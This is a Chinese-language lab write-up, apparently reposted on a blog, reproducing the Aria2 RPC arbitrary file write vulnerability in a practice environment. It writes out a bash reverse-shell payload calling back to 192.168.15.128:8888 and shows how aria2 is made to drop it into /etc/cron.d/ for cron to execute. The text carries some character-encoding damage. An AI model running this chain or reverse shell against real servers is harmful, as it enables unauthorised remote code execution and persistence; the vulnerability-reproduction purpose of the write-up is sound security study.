Aria2任意文件写入漏洞 漏洞复现
Aria2任意文件寫入漏洞
by ADummy
0x00利用路線
? 第三方UI與目標(biāo)進(jìn)行通信—>搭建http服務(wù)器—>讓目標(biāo)下載惡意文件—>定時(shí)任務(wù)執(zhí)行—>反彈shell
0x01漏洞介紹
? Aria2是一個(gè)輕量級(jí),多協(xié)議,多源下載工具(支持HTTP / HTTPS,FTP,BitTorrent,Metalink),內(nèi)置XML-RPC和JSON-RPC接口。在有權(quán)限的情況下,我們可以使用RPC接口來(lái)操作aria2來(lái)下載文件,將文件下載至任意目錄,造成一個(gè)任意文件寫入漏洞。通過(guò)控制文件下載鏈接,文件儲(chǔ)存路徑以及文件名,可以實(shí)現(xiàn)任意文件寫入。同時(shí)通過(guò)Aria2提供的其他功能,諸如save-session等也能輕易地實(shí)現(xiàn)任意文件寫入指定功能
0x02漏洞復(fù)現(xiàn)
**PAYLOAD:
#! /bin/bash /bin/bash -i >& /dev/tcp/192.168.15.128/8888 0>&1? 6800是aria2的rpc服務(wù)的默認(rèn)端口,環(huán)境啟動(dòng)后,訪問(wèn)http://your-ip:6800/,看到一個(gè)空白頁(yè)面,通過(guò)bp抓包可以看到返回了404,說(shuō)明服務(wù)已啟動(dòng)
? 由于rpc通信需要json或xml,因此不方便,因此我們可以使用第三方UI與目標(biāo)進(jìn)行通信,例如http://binux.github.io/yaaw/demo/
? 打開yaaw,單擊配置按鈕,然后填寫運(yùn)行aria2:的目標(biāo)域名http://your-ip:6800/jsonrpc
? python創(chuàng)建一個(gè)簡(jiǎn)單的服務(wù)器。
Python2 :python2 -m SimpleHTTPServer 8000
Python3 :python3 -m http.server 8000
? 搭建成功后訪問(wèn)一下,可以看到寫好的shell文件
? 然后單擊“添加+”以添加新的下載任務(wù)。在“目錄”(Dir)字段中填寫要下載文件的目錄,并在“文件名”(File Name)字段中填寫所需的文件名。例如,我們將通過(guò)編寫crond任務(wù)來(lái)下載反向shell程序
? 此時(shí),arai2會(huì)將惡意文件(您指定的URL)下載到/etc/cron.d/目錄中,文件名為“ shell”。在debian中,/ etc / cron.d目錄中的所有文件都將作為計(jì)劃任務(wù)配置文件(如crontab)讀取。編寫完成后,我們必須等待一分鐘才能執(zhí)行反向Shell腳本
此處環(huán)境有問(wèn)題,等了很久都沒(méi)反彈到shell,看人家說(shuō)是1分鐘左右,于是找了下原因,在這篇博客中https://www.cnblogs.com/foe0/p/11353506.html博主就說(shuō)了大概率是靶場(chǎng)環(huán)境不完整導(dǎo)致的。既然他定時(shí)任務(wù)動(dòng)不了,那我自己動(dòng)手不過(guò)分吧
0x03參考資料
https://www.dtmao.cc/news_show_469672.shtml
其他利用方法:https://paper.seebug.org/120/
總結(jié)
以上是生活随笔為你收集整理的Aria2任意文件写入漏洞 漏洞复现的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 原型设计软件Axure RP 9中文版
- 下一篇: 谭其骧版《中国历史地图集》纠正上线工作完